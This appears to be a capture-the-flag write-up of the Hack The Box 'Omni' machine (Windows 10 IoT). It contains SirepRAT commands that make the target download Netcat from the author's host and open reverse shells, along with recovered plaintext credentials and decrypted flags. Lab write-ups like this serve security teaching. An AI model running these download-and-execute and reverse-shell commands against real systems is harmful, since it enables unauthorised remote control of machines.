The box Omni had a very unusual Operating System for HTB machines. It was a Windows 10 IoT machine, which was new for me. The foothold consisted of an exploit for this Operating System. For user and root, I used the same technique and grabbed reverse shells.
[0x1] Reconnaissance & Enumeration
The start of this journey includes the well-known Nmap scan. There are a few ports open, including RPC, WinRM (5985), a web port, and some higher ports. Port 8080 is detected as an IIS web server and hosts a site that identifies itself as “Windows Device Portal”. A quick search explains that this portal belongs to the Windows 10 IoT Operating System.
nmap -sC -sV -p- -oA omni 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.039s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=11/2%Time=5FA05F74%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
Visiting the website on port 8080 only gives an HTTP Basic authentication prompt; you have to authenticate before you can access the Device Portal.
[0x2] Initial Foothold
While searching for Windows IoT vulnerabilities, I stumbled upon a GitHub page called “SirepRAT – RCE as SYSTEM on Microsoft IoT Core”. This described a vulnerability in Windows IoT Core’s Sirep Service. This service is installed with the Operating System by default and included to help test drivers and hardware.
The exploit described a way to execute commands as SYSTEM remotely. The first thing that came to my mind was to use it to launch a reverse shell and get access to the machine. Let’s fire up a Python web server to serve Netcat for Windows on port 8000.
python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
To get that Netcat for Windows to the other side, I used the SirepRAT exploit to have the box download it into a directory I know is writable on a Windows machine. This worked like a charm and Netcat is now ready for launch.
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "powershell" --args " /c Invoke-WebRequest -Uri 'http://10.10.14.64:8000/nc64.exe' -OutFile 'c:\\windows\\system32\\spool\\drivers\\color\\nc64.exe'" --v
Before I can run Netcat, I have to make sure the listener on my side is ready for an incoming connection.
rlwrap netcat -lvnp 1337
listening on [any] 1337 ...
With the executable in place, and my Netcat listener running, it is time to run Netcat remotely and call home to my machine on port 1337 with a command prompt.
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "cmd.exe" --args " /c c:\\windows\\system32\\spool\\drivers\\color\\nc64.exe 10.10.14.64 1337 -e cmd" --v
Just as I expected, that worked like a charm. It is always a surprise when the tools you use on a Microsoft Windows machine are not blocked by something like Defender, which is still included in Windows 10 IoT. Nevertheless, we’ve got a shell. I had to search for a way to find out which user I am logged on as, since whoami does not exist on this box. Courtesy of Windows 10 IoT.
connect to [10.10.14.64] from (UNKNOWN) [10.10.10.204] 49682
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

PS C:\> $env:username
$env:username
DefaultAccount
[0x3] Path to User flag
The box seemed pretty standard, with no interesting software or services. One thing I always do on Windows boxes is run a search for specific file types: text files, batch files, and PowerShell scripts. Many Windows boxes hide their gems like that. I also did a quick check for any other usernames that look interesting, and one for the flag (which was not there).
PS C:\data\users> dir -force
dir -force

    Directory: C:\data\users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         7/4/2020   9:48 PM                administrator
d-----         7/4/2020   9:53 PM                app
d-rh--         7/4/2020  12:22 AM                Default
d-----         7/3/2020  11:22 PM                DefaultAccount
d-----         7/3/2020  11:22 PM                DevToolsUser
d-r---        8/21/2020   1:55 PM                Public
d-----         7/4/2020  10:29 PM                System
So for the search, I use a quick and dirty PowerShell command per extension. It does the trick.
PS C:\> Get-ChildItem c:\*.txt -force -Recurse
PS C:\> Get-ChildItem c:\*.xml -force -Recurse
PS C:\> Get-ChildItem c:\*.bat -force -Recurse
A few files were returned by the search, batch files to be precise. Since r.bat does not sound like a default Windows file (and it is hidden, note the h attribute), I decided to take a closer look.
    Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a-h--        8/21/2020  12:56 PM            247 r.bat

    Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/26/2018  11:36 PM            925 Pester.bat

    Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/26/2018  11:36 PM            744 Build.bat
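The per-extension search above gets the job done, but when triaging a box (or auditing your own) it helps to run one pass over several extensions, keep hidden and system files in the results, and show who owns each file and when it changed, so a stray hidden script like r.bat stands out from the vendor-shipped Pester files. The following is an added example written for this write-up and not the author's own command; the root directories, the extension list and the Pester exclusion are assumptions to adjust per host.

```powershell
# Added example (not from the original write-up): one-pass hunt for script and
# config files that reports attributes, owner and modification time.
# Assumed search roots and extension list; adjust for the host being examined.
$Roots      = @('C:\data', 'C:\Program Files', 'C:\Windows\Temp')
$Extensions = @('*.txt', '*.xml', '*.bat', '*.cmd', '*.ps1')

$hits = foreach ($root in $Roots) {
    if (-not (Test-Path -Path $root)) { continue }
    # -Force keeps hidden/system entries (r.bat was -a-h--); -File drops directories.
    Get-ChildItem -Path $root -Include $Extensions -File -Force -Recurse -ErrorAction SilentlyContinue |
        # Assumed allow-list: the Pester module tree ships with PowerShell and is expected here.
        Where-Object { $_.FullName -notlike '*\Modules\Pester\*' }
}

$hits |
    Select-Object FullName, Length, LastWriteTime,
        @{ Name = 'Attributes'; Expression = { $_.Attributes.ToString() } },
        @{ Name = 'Owner';      Expression = { (Get-Acl -Path $_.FullName -ErrorAction SilentlyContinue).Owner } } |
    Sort-Object -Property LastWriteTime -Descending |
    Format-Table -AutoSize
```

Sorting by LastWriteTime puts recently dropped files first; in this box the 8/21/2020 timestamp on r.bat already separates it from the 2018 Pester files, and the Hidden attribute plus a non-SYSTEM owner would be the next thing to check.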
The script showed two sets of credentials, one for the user ‘app’ and one for the user ‘administrator’. It runs in an endless loop that removes every member of the local administrators group and resets both passwords every few seconds. That sounds promising.
type r.bat
@echo off
:LOOP
for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete
net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz
ping -n 3 127.0.0.1
cls
GOTO :LOOP
:EXIT
With the credentials for ‘app’ I decided to log on to the Windows Device Portal and see whether that can help me get to the next step on this box.
After authenticating as ‘app’ I find a nice option to run commands. Since the Netcat for Windows executable is still present on the box, I try to run it in the context of the logged-on user ‘app’. Before launching it, I start a new listener on my machine to catch the incoming connection.
rlwrap netcat -lvnp 1338
listening on [any] 1338 ...
The reverse shell worked and now I have a new connection as the user app.
listening on [any] 1338 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.10.204] 49684
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32>
PS C:\windows\system32> $env:username
$env:username
app
With the new shell active, I go on to look for the user flag. There are two interesting files in the home directory of this user: user.txt and hardening.txt.
PS C:\data\users\app> dir
dir

    Directory: C:\data\users\app

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         7/4/2020   7:28 PM                3D Objects
d-r---         7/4/2020   7:28 PM                Documents
d-r---         7/4/2020   7:28 PM                Downloads
d-----         7/4/2020   7:28 PM                Favorites
d-r---         7/4/2020   7:28 PM                Music
d-r---         7/4/2020   7:28 PM                Pictures
d-r---         7/4/2020   7:28 PM                Videos
-ar---         7/4/2020   8:20 PM            344 hardening.txt
-ar---         7/4/2020   8:14 PM           1858 iot-admin.xml
-ar---         7/4/2020   9:53 PM           1958 user.txt
The content of the hardening file is not that interesting, but it does hint that the administrator password I found in r.bat is the current one, since the default was changed.
type hardening.txt
- changed default administrator password of "p@ssw0rd"
- added firewall rules to restrict unnecessary services
- removed administrator account from "Ssh Users" group
The content of user.txt is a whole different story. Normally you would find the code to submit to the Hack The Box website, but this time the flag seems to be encrypted. Based on the structure it is a PSCredential object serialized by PowerShell’s Export-CliXml: the password lives in the SS (SecureString) element as a DPAPI-protected blob, which only the user who wrote the file can decrypt on this machine.
type user.txt
<Objs Version="18.104.22.168" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">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</SS>
    </Props>
  </Obj>
</Objs>
If you are familiar with the way PowerShell protects strings, decoding the flag is easy: import the file as the same user and read the password back. The user flag is now in my possession.
$credential = Import-CliXml -Path user.txt
$credential.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70
[0x4] Path to Root flag
Since we already have credentials for the administrator, I check whether the same technique can be used to get a root shell. So again I start a listener, log in to the website with the Administrator credentials from the batch file, and execute Netcat to connect to my listener. It worked like a charm. Now I have myself a nice reverse shell as ‘Administrator’.
listening on [any] 1339 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.10.204] 49685
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> $env:username
$env:username
Administrator
It looks like the root flag is also present here and we can simply grab it and call it a day.
PS C:\data\users\administrator> dir

    Directory: C:\data\users\administrator

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         7/3/2020  11:23 PM                3D Objects
d-r---         7/3/2020  11:23 PM                Documents
d-r---         7/3/2020  11:23 PM                Downloads
d-----         7/3/2020  11:23 PM                Favorites
d-r---         7/3/2020  11:23 PM                Music
d-r---         7/3/2020  11:23 PM                Pictures
d-r---         7/3/2020  11:23 PM                Videos
-ar---         7/4/2020   9:48 PM           1958 root.txt
How about that, it is also protected using the same method as the user flag, and again only readable from a shell running as the user who created it.
PS C:\data\users\administrator> type root.txt
<Objs Version="22.214.171.124" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">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</SS>
    </Props>
  </Obj>
</Objs>
We can decrypt root.txt the same way and submit the root flag for this box. I can officially call Omni rooted.
$credential = Import-CliXml -Path root.txt
$credential.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
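Both user.txt and root.txt are PSCredential objects written with Export-CliXml, and the write-up decrypts each one from a shell running as the user who owns it. The following is an added example, not code from the original post, that shows why that is the boundary: Export-CliXml protects the SecureString with DPAPI under the writing user’s profile, so Import-CliXml (or the equivalent manual ConvertTo-SecureString step) succeeds for that user on that machine and fails for anyone else. The secret value and the scratch path are constructed for the demo.

```powershell
# Added example (not from the original write-up): round-trip of a PSCredential
# through Export-CliXml / Import-CliXml, plus the manual DPAPI step, to show
# what is actually stored on disk and who can read it back.
$path  = Join-Path -Path $env:TEMP -ChildPath 'clixml-demo.xml'   # assumed scratch location
$plain = ConvertTo-SecureString -String 'example-secret' -AsPlainText -Force   # constructed sample value
$cred  = [System.Management.Automation.PSCredential]::new('flag', $plain)
$cred | Export-CliXml -Path $path

# On disk the <SS N="Password"> element holds a hex-encoded DPAPI blob, not the password.
$xml  = [xml](Get-Content -Path $path -Raw)
$blob = $xml.Objs.Obj.Props.SS.'#text'
"Stored SecureString blob: $($blob.Length) hex characters, prefix $($blob.Substring(0, 16))"

# Same user on the same machine: Import-CliXml unprotects the blob and the password is back.
$back = Import-CliXml -Path $path
"Import-CliXml as $env:USERNAME gives: $($back.GetNetworkCredential().Password)"

# The same thing done by hand. ConvertTo-SecureString without -Key uses the
# current user's DPAPI key, which is what Import-CliXml does for <SS> elements.
# Run under a different account (or on another machine) the call throws a
# CryptographicException, typically 'Key not valid for use in specified state.'
try {
    $ss = ConvertTo-SecureString -String $blob -ErrorAction Stop
    "Manual DPAPI unprotect gives: $([System.Net.NetworkCredential]::new('', $ss).Password)"
} catch {
    "Manual DPAPI unprotect failed: $($_.Exception.Message)"
}

Remove-Item -Path $path -ErrorAction SilentlyContinue
```

The practical consequence for this box is the one the write-up follows: a SYSTEM-level command execution through SirepRAT does not read these files, because the DPAPI key belongs to ‘app’ and ‘administrator’ respectively. For defenders, the flip side is that a CliXml credential file is only as safe as the account that wrote it; anyone who can run code as that user reads the secret without ever seeing the DPAPI key.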